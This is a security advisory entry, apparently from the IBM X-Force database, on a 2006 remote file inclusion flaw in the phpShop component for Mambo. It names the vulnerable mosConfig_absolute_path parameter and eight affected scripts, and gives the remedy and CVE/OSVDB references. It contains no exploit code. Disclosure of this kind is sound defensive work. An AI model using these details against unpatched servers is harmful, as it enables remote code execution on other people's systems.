phpShop component for Mambo toolbar.phpshop.html.php file include
| phpshop-toolbarphpshop-file-include (28441) |  Medium Risk |
Description:
phpShop component for Mambo (now known as VirtueMart) could allow a remote attacker to include arbitrary files. A remote attacker could send a specially-crafted URL request to the toolbar.phpshop.html.php script using the mosConfig_absolute_path parameter to specify a malicious file from a remote system, which could allow the attacker to execute arbitrary code on the vulnerable Web server.
Note: The following scripts are reported to be vulnerable:
mod_phpshop.php
mod_phpshop_allinone.php
mod_phpshop_cart.php
mod_phpshop_featureprod.php
mod_phpshop_latestprod.php
mod_product_categories.php
mod_productscroller.php
mosproductsnap.php
Platforms Affected:
- Mamboserver, phpShop component for Mambo 1.2 RC2b and prior
Remedy:
Upgrade to the latest version of phpShop (1.2 RC2b or later), available from the phpShop Web site. See References.
Consequences:
Gain Access
References:
- BugTraq Mailing List, Fri Aug 18 2006 - 17:51:50 CDT, Re: mambo-phphop Product Scroller Module R.F.I at http://archives.neohapsis.com/archives/bugtraq/2006-08/0436.html.
- BugTraq Mailing List, Thu Aug 17 2006 - 23:29:06 CDT , mambo-phphop Product Scroller Module R.F.I at http://archives.neohapsis.com/archives/bugtraq/2006-08/0363.html.
- VirtueMart Web site, VirtueMart (formerly mambo-phpShop) at http://www.mambo-phpshop.net.
- BID-19591: Mambo Phpshop Product Scroller Component Multiple Remote File Include Vulnerabilities
- BID-19879: VirtueMart MosConfig_Absolute_Path Parameter Remote File Include Vulnerability
- CVE-2006-4263: Multiple PHP remote file inclusion vulnerabilities in the Product Scroller Module and other modules in mambo-phpshop (com_phpshop) for Mambo and Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter in (1) mod_phpshop.php, (2) mod_phpshop_allinone.php, (3) mod_phpshop_cart.php, (4) mod_phpshop_featureprod.php, (5) mod_phpshop_latestprod.php, (6) mod_product_categories.php, (7) mod_productscroller.php, and (8) mosproductsnap.php.
- OSVDB ID: 28151: mambo-phpShop mod_phpshop.php mosConfig_absolute_path Variable Remote File Inclusion
- OSVDB ID: 28152: mambo-phpShop mod_phpshop_allinone.php mosConfig_absolute_path Variable Remote File Inclusion
- OSVDB ID: 28153: mambo-phpShop mod_phpshop_cart.php mosConfig_absolute_path Variable Remote File Inclusion
- OSVDB ID: 28154: mambo-phpShop mod_phpshop_featureprod.php mosConfig_absolute_path Variable Remote File Inclusion
- OSVDB ID: 28155: mambo-phpShop mod_phpshop_latestprod.php mosConfig_absolute_path Variable Remote File Inclusion
- OSVDB ID: 28156: mambo-phpShop mod_product_categories.php mosConfig_absolute_path Variable Remote File Inclusion
- OSVDB ID: 28158: mambo-phpShop mosproductsnap.php mosConfig_absolute_path Variable Remote File Inclusion
Reported:
Aug 17, 2006
The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
For corrections or additions please email xforce@iss.net